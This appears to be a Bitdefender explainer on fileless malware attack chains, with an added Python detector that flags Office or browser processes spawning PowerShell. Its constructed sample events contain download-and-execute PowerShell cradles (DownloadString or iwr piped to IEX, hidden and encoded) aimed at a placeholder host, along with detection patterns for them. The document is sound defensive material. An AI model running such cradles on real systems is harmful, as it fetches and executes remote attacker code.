What is a fileless attack?
Fileless malware attacks are also referred to as fileless attacks. They are sometimes also called non-malware attacks, although that term is not technically accurate: malicious code still runs, it just is not stored as a file on disk.
Unlike file-based attacks, fileless malware attacks do not download malicious files or write content to disk. Attackers exploit application vulnerabilities to inject code directly into the memory space of an existing application. They can also leverage trusted office applications or administration tools native to Windows, such as PowerShell or Windows Management Instrumentation (WMI), to run scripts and load malicious code directly into memory. As with any attack, the objective is to gain control of computers in order to achieve the attacker’s goal, such as destruction, distortion (ransomware), data or credential theft, or staging additional attacks.
How to Stop Fileless Attacks at Pre-execution
At Bitdefender, we challenge ourselves to protect our customers against the full spectrum of threats: file-based and fileless malware.
As in the example illustrated above, a phishing email containing a link takes the user to an exploit-hosting site. The browser exploit launches PowerShell with a command line (a script); PowerShell then follows those instructions to download an additional script (typically a larger command line) from a remote site. The larger command line contains the fileless malware, which is assembled and run directly in memory.
In a second example, a user may receive a phishing email with a .doc attachment containing a macro. If the user enables the macro (essentially a VBA script), it launches a PowerShell script that downloads additional scripts containing the fileless malware code from a remote location. It then injects that malicious code into the memory space of a vulnerable application.
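Both chains above share a telemetry signature a defender can look for at pre-execution: a browser or an Office document process spawning a script host (PowerShell), with a command line that fetches content from a remote site and runs it in memory. The following Python is an added example, not Bitdefender code; it scores constructed process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), decodes a -EncodedCommand payload before matching so base64 does not hide the cradle, and raises a finding above a threshold. The weights, thresholds, process names and the sample events are assumptions chosen for illustration.

```python
"""Spot the execution chains described above (browser or Office document ->
PowerShell -> remote script run in memory) in process-creation telemetry.
Added example, not Bitdefender code; the event records are constructed,
shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine)."""
import base64
import re
from dataclasses import dataclass

# Parents that should almost never launch a script host directly (assumed lists).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSER_PARENTS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "wmic.exe"}

# Command-line traits of "fetch a script and run it without touching disk".
# Each hit adds a small weight; the parent/child pairing carries more.
ARG_PATTERNS = [
    ("encoded-command", re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\b", re.I)),
    ("hidden-window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile",      re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I)),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|"
                                   r"net\.webclient|\biwr\b", re.I)),
    ("in-memory-exec",  re.compile(r"\biex\b|invoke-expression", re.I)),
]
PARENT_WEIGHT, ARG_WEIGHT, ALERT_THRESHOLD = 5, 2, 5  # assumed tuning values


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    score: int
    reasons: list
    event: ProcessEvent


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or None when there is none or it does not decode cleanly."""
    m = re.search(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
                  command_line, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcessEvent):
    """Score one event; returns (score, reasons). Patterns are matched against
    the command line *and* its decoded -EncodedCommand payload."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if child not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if parent in DOCUMENT_PARENTS:
        score, reasons = PARENT_WEIGHT, ["office-spawned-script-host"]
    elif parent in BROWSER_PARENTS:
        score, reasons = PARENT_WEIGHT, ["browser-spawned-script-host"]
    decoded = decode_encoded_command(ev.command_line)
    text = ev.command_line + ("\n" + decoded if decoded else "")
    for name, pattern in ARG_PATTERNS:
        if pattern.search(text):
            score += ARG_WEIGHT
            reasons.append(name)
    return score, reasons


def detect(events, threshold=ALERT_THRESHOLD):
    """Return a Finding for every event whose score reaches the threshold."""
    findings = []
    for ev in events:
        score, reasons = analyze(ev)
        if score >= threshold:
            findings.append(Finding(score, reasons, ev))
    return findings


# Constructed sample telemetry (not real captures). The encoded payload is
# built here so the sample stays readable; example.invalid is a reserved name.
_STAGE2 = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1') | IEX"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # Macro in a .doc launches a hidden, encoded PowerShell stager.
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _ENCODED),
    # Browser exploit launches PowerShell with a plaintext download cradle.
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"iwr http://example.invalid/a | iex\""),
    # Admin runs a maintenance script from Explorer: no parent hit, one weak arg hit.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    # Word spawning its print helper: not a script host, ignored.
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"score={f.score:2d} {_basename(f.event.parent_image)} -> "
              f"{_basename(f.event.image)}: {', '.join(f.reasons)}")
```

The parent/child relationship carries most of the weight on purpose: an Office or browser process launching PowerShell is rare in normal use, so it is worth a look even when the command line is unremarkable, while the argument patterns on their own (an administrator's `-NoProfile -File` script, event three) stay below the threshold. Decoding the payload before matching is what keeps the first sample from slipping past as an opaque base64 blob.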